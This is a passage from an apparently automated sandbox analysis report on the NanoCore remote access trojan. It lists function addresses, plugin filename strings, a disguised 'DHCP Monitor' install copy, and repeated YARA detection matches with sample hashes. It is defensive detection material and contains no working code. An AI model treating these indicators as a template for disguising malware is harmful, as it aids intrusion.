      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_022DBBD410_2_022DBBD4
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_050DF5F810_2_050DF5F8
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_050D978810_2_050D9788
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_050DA5D010_2_050DA5D0
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_05263E3010_2_05263E30
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_05264A5010_2_05264A50
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_05264B0810_2_05264B08
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_1_0040A2A510_1_0040A2A5
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_0040A2A511_2_0040A2A5
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_0215E47111_2_0215E471
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_0215E48011_2_0215E480
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_0215BBD411_2_0215BBD4
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_0508F5F811_2_0508F5F8
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_0508978811_2_05089788
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_0508A5D011_2_0508A5D0
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_0508A61011_2_0508A610
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_05253E3011_2_05253E30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_05254A5011_2_05254A50
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_05254B0811_2_05254B08
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_1_0040A2A511_1_0040A2A5
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_0040A2A513_2_0040A2A5
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_0499E48013_2_0499E480
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_0499E47013_2_0499E470
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_0499BBD413_2_0499BBD4
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_051CF5F813_2_051CF5F8
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_051C978813_2_051C9788
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_051CA61013_2_051CA610
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_05393E3013_2_05393E30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_05394A5013_2_05394A50
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_05394B0813_2_05394B08
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_1_0040A2A513_1_0040A2A5
      Source: C:\Users\user\Desktop\nanocore.exeCode function: String function: 004059BF appears 34 times
      Source: C:\Users\user\Desktop\nanocore.exeCode function: String function: 00401ED0 appears 69 times
      Source: C:\Users\user\Desktop\nanocore.exeCode function: String function: 0040569E appears 54 times
      Source: C:\Users\user\Desktop\nanocore.exeCode function: String function: 00402A9A appears 52 times
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: String function: 00401ED0 appears 92 times
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: String function: 004056B5 appears 32 times
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: String function: 0040569E appears 72 times
      Source: nanocore.exe, 00000001.00000003.643905225.000000001F026000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nanocore.exe
      Source: nanocore.exe, 00000002.00000002.909718958.00000000058E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs nanocore.exe
      Source: nanocore.exe, 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs nanocore.exe
      Source: nanocore.exe, 00000002.00000002.909617684.00000000057B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs nanocore.exe
      Source: nanocore.exe, 00000002.00000002.905801654.0000000002531000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs nanocore.exe
      Source: nanocore.exe, 00000002.00000002.909912427.0000000006530000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs nanocore.exe
      Source: nanocore.exe, 00000002.00000002.909495534.0000000005250000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs nanocore.exe
      Source: nanocore.exe, 00000008.00000003.664138784.000000001F20F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nanocore.exe
      Source: nanocore.exe, 0000000A.00000002.684361480.0000000002510000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs nanocore.exe
      Source: nanocore.exe, 0000000A.00000002.684361480.0000000002510000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs nanocore.exe
      Source: nanocore.exe, 0000000A.00000002.684499268.00000000034FC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs nanocore.exe
      Source: nanocore.exe, 0000000A.00000002.687348266.0000000005230000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs nanocore.exe
      Source: nanocore.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000B.00000002.684555433.0000000002320000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.684361480.0000000002510000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.684499268.00000000034FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000D.00000002.703774283.000000000342C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000D.00000002.703677926.0000000002440000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000B.00000002.684652674.000000000330C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.909667904.0000000005820000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.909667904.0000000005820000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
